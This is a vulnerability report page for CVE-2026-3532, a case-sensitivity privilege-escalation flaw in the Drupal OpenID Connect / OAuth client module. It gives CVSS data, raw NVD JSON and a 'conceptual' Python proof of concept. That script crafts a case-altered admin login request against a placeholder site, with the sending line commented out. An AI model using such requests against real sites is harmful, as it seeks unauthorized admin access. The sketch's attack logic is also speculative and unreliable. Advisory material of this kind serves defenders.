Security Vulnerability Report
中文
CVE-2026-3532 CVSS 4.2 MEDIUM

CVE-2026-3532

Published: 2026-03-26 21:17:09
Last Modified: 2026-04-01 16:14:45

Description

Improper Handling of Case Sensitivity vulnerability in Drupal OpenID Connect / OAuth client allows Privilege Escalation.This issue affects OpenID Connect / OAuth client: from 0.0.0 before 1.5.0.

CVSS Details

CVSS Score
4.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:bojanz:openid_connect_\/_oauth_client:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal OpenID Connect / OAuth client < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-3532 # This script demonstrates the logic of exploiting case sensitivity. # Actual exploit depends on specific IdP configuration. import requests target_url = "https://example-drupal-site.com" # Assume the legitimate admin username is 'admin' # Attacker crafts an authentication request with 'Admin' payload = { "client_id": "vulnerable_client_id", "response_type": "code", "scope": "openid email profile", "redirect_uri": "https://example-drupal-site.com/callback", # The malicious part: changing case of the identifier "login_hint": "[email protected]" } print(f"Sending crafted authentication request to {target_url}...") # response = requests.post(target_url + "/openid/connect/authenticate", data=payload) print("If vulnerable, the system may treat 'Admin' as a new user or elevate privileges.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3532", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:09.420", "lastModified": "2026-04-01T16:14:44.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Handling of Case Sensitivity vulnerability in Drupal OpenID Connect / OAuth client allows Privilege Escalation.This issue affects OpenID Connect / OAuth client: from 0.0.0 before 1.5.0."}, {"lang": "es", "value": "Vulnerabilidad de manejo incorrecto de la sensibilidad a mayúsculas y minúsculas en el cliente Drupal OpenID Connect / OAuth permite la escalada de privilegios. Este problema afecta al cliente OpenID Connect / OAuth: desde la 0.0.0 anterior a la 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-178"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bojanz:openid_connect_\\/_oauth_client:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "8.x-1.5", "matchCriteriaId": "4659C484-D955-4875-A0CC-3EF717150D8A"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-027", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}